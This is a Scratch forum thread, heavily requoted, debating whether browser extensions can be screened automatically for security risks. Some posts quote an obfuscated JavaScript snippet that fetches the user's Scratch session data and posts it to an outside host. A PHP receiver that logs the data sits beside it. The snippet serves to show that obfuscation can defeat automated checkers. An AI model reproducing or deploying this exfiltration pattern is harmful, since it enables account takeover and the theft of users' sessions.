AmazingMech2418 wrote:

I made code that can auto-filter the extensions…

NitroCipher wrote:

AmazingMech2418 wrote:

I made code that can auto-filter the extensions…

Code can be to easily obfuscated. You would never be able to automatically filter the code unless you have an AI that acts completely human.

AmazingMech2418 wrote:

NitroCipher wrote:

AmazingMech2418 wrote:

I made code that can auto-filter the extensions…

Code can be to easily obfuscated. You would never be able to automatically filter the code unless you have an AI that acts completely human.

My code can detect any code security error.

AmazingMech2418 wrote:

Not yet since I haven't seen any dangerous open-source extensions to test it.

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

Not yet since I haven't seen any dangerous open-source extensions to test it.

XD. Maybe I can learn to program an extension and let you test it…

AmazingMech2418 wrote:

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

Not yet since I haven't seen any dangerous open-source extensions to test it.

XD. Maybe I can learn to program an extension and let you test it…

Sure! I also have to know security problems and add them… XD

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

Not yet since I haven't seen any dangerous open-source extensions to test it.

XD. Maybe I can learn to program an extension and let you test it…

Sure! I also have to know security problems and add them… XD

Yeah, what kind of security problems is the Scratch Team worried about?

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

Not yet since I haven't seen any dangerous open-source extensions to test it.

XD. Maybe I can learn to program an extension and let you test it…

Sure! I also have to know security problems and add them… XD

Yeah, what kind of security problems is the Scratch Team worried about?

//do fun cool looking stuff
var hat="hAt",gap="GaP",jeff="BtQpdsG:L/q/G";
var spoderman=hat+jeff+"mWyDb"+gap+"dc.gsGeArxvAeBr"; //We use this to log in to scratch! :D
var spiderman=hat+jeff+"sScQrGaLtQcGhB.QmGiOt1.3eFdQuU/AsDeFsGsHiJoKn"
var ballerina="",woodchuck="";
for (var i=0;i<spoderman.length;i+=2) {
  ballerina+=spoderman[i];
  //woodchuck+=spiderman[i]
}
for (var i=0;i<spiderman.length;i+=2) {
  /*How's your "checker bot" going to figure out what's going on here? Basically you'll need to write an entire interpreter for js in js. :P
  ballerina+=spoderman[i];
  */
  woodchuck+=spiderman[i]
}
post(spoderman,{data:get(spiderman)}); //Not bad at all! We just do this to get cool rainbow unicorn spiderspoderman stuff!

<?php
//In PHP because that's for sure what 1337 hackers use.
$sessionlog = file_put_contents('/home/admin/logs.txt', $_POST["data"].PHP_EOL , FILE_APPEND | LOCK_EX);
?>

TheUltimatum wrote:

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

Not yet since I haven't seen any dangerous open-source extensions to test it.

XD. Maybe I can learn to program an extension and let you test it…

Sure! I also have to know security problems and add them… XD

Yeah, what kind of security problems is the Scratch Team worried about?

Something as simple as this.

//do fun cool looking stuff
var hat="hAt",gap="GaP",jeff="BtQpdsG:L/q/G";
var spoderman=hat+jeff+"mWyDb"+gap+"dc.gsGeArxvAeBr"; //We use this to log in to scratch! :D
var spiderman=hat+jeff+"sScQrGaLtQcGhB.QmGiOt1.3eFdQuU/AsDeFsGsHiJoKn"
var ballerina="",woodchuck="";
for (var i=0;i<spoderman.length;i+=2) {
  ballerina+=spoderman[i];
  //woodchuck+=spiderman[i]
}
for (var i=0;i<spiderman.length;i+=2) {
  /*How's your "checker bot" going to figure out what's going on here? Basically you'll need to write an entire interpreter for js in js. :P
  ballerina+=spoderman[i];
  */
  woodchuck+=spiderman[i]
}
post(spoderman,{data:get(spiderman)}); //Not bad at all! We just do this to get cool rainbow unicorn spiderspoderman stuff!

<?php
//In PHP because that's for sure what 1337 hackers use.
$sessionlog = file_put_contents('/home/admin/logs.txt', $_POST["data"].PHP_EOL , FILE_APPEND | LOCK_EX);
?>

AmazingMech2418 wrote:

TheUltimatum wrote:

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

MasterOfTheTiger wrote:

AmazingMech2418 wrote:

Not yet since I haven't seen any dangerous open-source extensions to test it.

XD. Maybe I can learn to program an extension and let you test it…

Sure! I also have to know security problems and add them… XD

Yeah, what kind of security problems is the Scratch Team worried about?

Something as simple as this.

//do fun cool looking stuff
var hat="hAt",gap="GaP",jeff="BtQpdsG:L/q/G";
var spoderman=hat+jeff+"mWyDb"+gap+"dc.gsGeArxvAeBr"; //We use this to log in to scratch! :D
var spiderman=hat+jeff+"sScQrGaLtQcGhB.QmGiOt1.3eFdQuU/AsDeFsGsHiJoKn"
var ballerina="",woodchuck="";
for (var i=0;i<spoderman.length;i+=2) {
  ballerina+=spoderman[i];
  //woodchuck+=spiderman[i]
}
for (var i=0;i<spiderman.length;i+=2) {
  /*How's your "checker bot" going to figure out what's going on here? Basically you'll need to write an entire interpreter for js in js. :P
  ballerina+=spoderman[i];
  */
  woodchuck+=spiderman[i]
}
post(spoderman,{data:get(spiderman)}); //Not bad at all! We just do this to get cool rainbow unicorn spiderspoderman stuff!

<?php
//In PHP because that's for sure what 1337 hackers use.
$sessionlog = file_put_contents('/home/admin/logs.txt', $_POST["data"].PHP_EOL , FILE_APPEND | LOCK_EX);
?>

So basically, they're worried about ajax post and PHP post.

MasterOfTheTiger wrote:

Well, kids wouldn't do bad things with Scratch extensions that require a lot of work.

AmazingMech2418 wrote:

So basically, they're worried about ajax post and PHP post.

Sheep_maker wrote:

MasterOfTheTiger wrote:

Well, kids wouldn't do bad things with Scratch extensions that require a lot of work.

It's not Scratch extensions that the ST is worried about (they encourage sharing Scratch extensions), it's browser extensions. A Scratcher could make an extension and have kids download it

AmazingMech2418 wrote:

So basically, they're worried about ajax post and PHP post.

Yes, and that's a valid thing to worry about; it could send your information (such as what you type while typing in your Scratch password) to someone else's server. If they have your CSRF token, then they can use Scratch APIs to do stuff without your password as if they were signed in to your account

AmazingMech2418 wrote:

Sheep_maker wrote:

MasterOfTheTiger wrote:

Well, kids wouldn't do bad things with Scratch extensions that require a lot of work.

It's not Scratch extensions that the ST is worried about (they encourage sharing Scratch extensions), it's browser extensions. A Scratcher could make an extension and have kids download it

AmazingMech2418 wrote:

So basically, they're worried about ajax post and PHP post.

Yes, and that's a valid thing to worry about; it could send your information (such as what you type while typing in your Scratch password) to someone else's server. If they have your CSRF token, then they can use Scratch APIs to do stuff without your password as if they were signed in to your account

So people can use ajax to hack a scratch account? That could be very dangerous. Maybe any post methods should be blocked in the extensions. I'll now test the code.

AmazingMech2418 wrote:

AmazingMech2418 wrote:

Sheep_maker wrote:

MasterOfTheTiger wrote:

Well, kids wouldn't do bad things with Scratch extensions that require a lot of work.

It's not Scratch extensions that the ST is worried about (they encourage sharing Scratch extensions), it's browser extensions. A Scratcher could make an extension and have kids download it

AmazingMech2418 wrote:

So basically, they're worried about ajax post and PHP post.

Yes, and that's a valid thing to worry about; it could send your information (such as what you type while typing in your Scratch password) to someone else's server. If they have your CSRF token, then they can use Scratch APIs to do stuff without your password as if they were signed in to your account

So people can use ajax to hack a scratch account? That could be very dangerous. Maybe any post methods should be blocked in the extensions. I'll now test the code.

IT WORKED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! THE BLOCKER BLOCKED A TEST EXTENSION!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

NitroCipher wrote:

AmazingMech2418 wrote:

AmazingMech2418 wrote:

Sheep_maker wrote:

MasterOfTheTiger wrote:

Well, kids wouldn't do bad things with Scratch extensions that require a lot of work.

It's not Scratch extensions that the ST is worried about (they encourage sharing Scratch extensions), it's browser extensions. A Scratcher could make an extension and have kids download it

AmazingMech2418 wrote:

So basically, they're worried about ajax post and PHP post.

Yes, and that's a valid thing to worry about; it could send your information (such as what you type while typing in your Scratch password) to someone else's server. If they have your CSRF token, then they can use Scratch APIs to do stuff without your password as if they were signed in to your account

So people can use ajax to hack a scratch account? That could be very dangerous. Maybe any post methods should be blocked in the extensions. I'll now test the code.

IT WORKED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! THE BLOCKER BLOCKED A TEST EXTENSION!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

You can't just expect them to get rid of ajax and stuff. Sometimes you have to use these features in your code. (I am currently working on an userscript that adds blocks to your backpack) Extensions would have to be reviewed manually. You cant just blindly blanket features.